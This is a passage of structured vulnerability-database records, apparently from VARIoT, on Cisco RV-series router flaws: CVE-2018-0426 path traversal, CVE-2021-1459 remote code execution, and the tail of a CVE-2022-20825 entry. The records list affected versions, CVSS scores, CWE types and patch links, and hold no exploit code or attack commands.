        },
        "data": [
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2022-55682"
          },
          {
            "date": "2022-06-15T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20825"
          },
          {
            "date": "2023-08-23T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-011650"
          },
          {
            "date": "2022-06-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202206-1532"
          },
          {
            "date": "2022-06-15T18:15:09.173000",
            "db": "NVD",
            "id": "CVE-2022-20825"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2022-55682"
          },
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20825"
          },
          {
            "date": "2023-08-23T07:09:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-011650"
          },
          {
            "date": "2023-07-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202206-1532"
          },
          {
            "date": "2024-11-21T06:43:37.997000",
            "db": "NVD",
            "id": "CVE-2022-20825"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-1532"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0 Out-of-bounds write vulnerability in router products",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-011650"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-1532"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201810-0304

    Vulnerability from variot - Updated: 2024-11-23 23:02

    A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper validation of directory traversal character sequences within the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to the targeted device. A successful exploit could allow the attacker to gain access to arbitrary files on the affected device, resulting in the disclosure of sensitive information. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0304",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 1.4,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 1.4,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.44"
          },
          {
            "model": "rv215w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.0.8"
          },
          {
            "model": "rv110w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.1.7"
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.0.1.3"
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.3.0.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.2.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.0.2.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.0.0.21"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18072"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-262"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0426"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          }
        ]
      },
      "cve": "CVE-2018-0426",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-0426",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-18072",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-118628",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-0426",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-0426",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-0426",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-18072",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201809-262",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-118628",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18072"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118628"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-262"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0426"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper validation of directory traversal character sequences within the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to the targeted device. A successful exploit could allow the attacker to gain access to arbitrary files on the affected device, resulting in the disclosure of sensitive information. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-0426"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18072"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118628"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-0426",
            "trust": 3.1
          },
          {
            "db": "SECTRACK",
            "id": "1041678",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010840",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-262",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18072",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-118628",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18072"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118628"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-262"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0426"
          }
        ]
      },
      "id": "VAR-201810-0304",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18072"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118628"
          }
        ],
        "trust": 1.2914166040000001
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18072"
          }
        ]
      },
      "last_update_date": "2024-11-23T23:02:00.654000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-20180905-rv-routers-traversal",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-rv-routers-traversal"
          },
          {
            "title": "CiscoRV110W, RV130W, RV215W Directory Traversal Vulnerability Patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/139765"
          },
          {
            "title": "Cisco RV110W Wireless-N VPN Firewall , RV130W Wireless-N Multifunction VPN Router  and RV215W Wireless-N VPN Router Repair measures for path traversal vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=84593"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18072"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-262"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-118628"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0426"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180905-rv-routers-traversal"
          },
          {
            "trust": 1.7,
            "url": "http://www.securitytracker.com/id/1041678"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-0426"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0426"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18072"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118628"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-262"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0426"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18072"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118628"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-262"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0426"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-09-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-18072"
          },
          {
            "date": "2018-10-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-118628"
          },
          {
            "date": "2018-12-25T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          },
          {
            "date": "2018-09-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201809-262"
          },
          {
            "date": "2018-10-05T14:29:01.170000",
            "db": "NVD",
            "id": "CVE-2018-0426"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-09-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-18072"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-118628"
          },
          {
            "date": "2018-12-25T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201809-262"
          },
          {
            "date": "2024-11-21T03:38:12.290000",
            "db": "NVD",
            "id": "CVE-2018-0426"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-262"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco Path traversal vulnerability in products",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010840"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-262"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0890

    Vulnerability from variot - Updated: 2024-11-23 22:54

    A vulnerability in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system of the affected device. Cisco has not released software updates that address this vulnerability

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0890",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv130",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1459"
          }
        ]
      },
      "cve": "CVE-2021-1459",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-1459",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-1459",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1459",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1459",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-451",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-1459",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1459"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-451"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1459"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1459"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system of the affected device. Cisco has not released software updates that address this vulnerability",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1459"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1459"
          }
        ],
        "trust": 0.99
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1459",
            "trust": 1.7
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.1165",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-451",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1459",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1459"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-451"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1459"
          }
        ]
      },
      "id": "VAR-202104-0890",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.6344417725
      },
      "last_update_date": "2024-11-23T22:54:48.464000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Cisco\u00a0Small Business RV110W, RV130, RV130W, and RV215W Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147032"
          },
          {
            "title": "Cisco: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-rce-q3rxHnvm"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1459"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-451"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-20",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1459"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
